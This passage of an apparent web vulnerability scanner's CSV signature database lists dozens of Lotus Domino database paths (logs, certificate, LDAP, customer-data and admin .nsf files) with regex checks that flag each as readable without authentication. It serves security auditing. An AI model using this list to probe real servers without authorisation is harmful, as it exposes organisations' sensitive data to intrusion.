information.\",\"\",\"\"\n\"007382\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/alog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007383\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/archive/a_domlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007384\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/archive/l_domlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007385\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/a_domlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007386\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/billing.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007387\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/bookmark.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007388\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/books.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007389\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/busytime.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007390\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/calendar.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007391\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/certa.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007392\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/certlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007393\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/certsrv.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007394\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/chatlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007395\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/clbusy.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007396\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/cldbdir.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007397\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/clusta4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007398\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/collect4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007399\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/cpa.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007400\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/customerdata.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007401\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/da.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007402\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/database.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007403\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/db.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007404\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dclf.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007405\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASAppDesign.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007406\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASLog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007407\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASLog01.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007408\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASLog02.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007409\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASLog03.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007410\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASLog04.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007411\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEASLog05.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007412\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/decsadm.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007413\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/decsdoc.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007414\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/decslog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007415\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/DEESAdmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007416\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/default.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007417\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dirassist.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007418\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doladmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007419\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dols_help.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007420\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/domadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007421\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/domcfg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007422\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/event.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007423\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/events.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007424\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/events5.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007425\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/group.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007426\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/groups.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007427\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help5_admin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007428\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help5_client.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007429\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help5_designer.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007430\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/homepage.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007431\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/iNotes/Forms5.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007432\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/jotter.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007433\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/kbccv11.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007434\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/kbnv11.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007435\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/kbssvv11.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007436\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/lcon.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007437\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/ldap.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007438\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/leiadm.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007439\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/leilog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007440\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/leivlt.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007441\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/log4a.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007442\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/lsxlc.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007443\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/l_domlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007444\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mab.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007445\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail/adminisist.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007446\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mailw46.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007447\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/msdwda.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007448\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mtatbls.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007449\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mtdata/mtstore.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007450\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mtstore.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007451\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/nntp/nd000000.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007452\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/nntp/nd000001.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007453\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/nntp/nd000002.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007454\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/nntp/nd000003.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007455\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/nntp/nd000004.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive 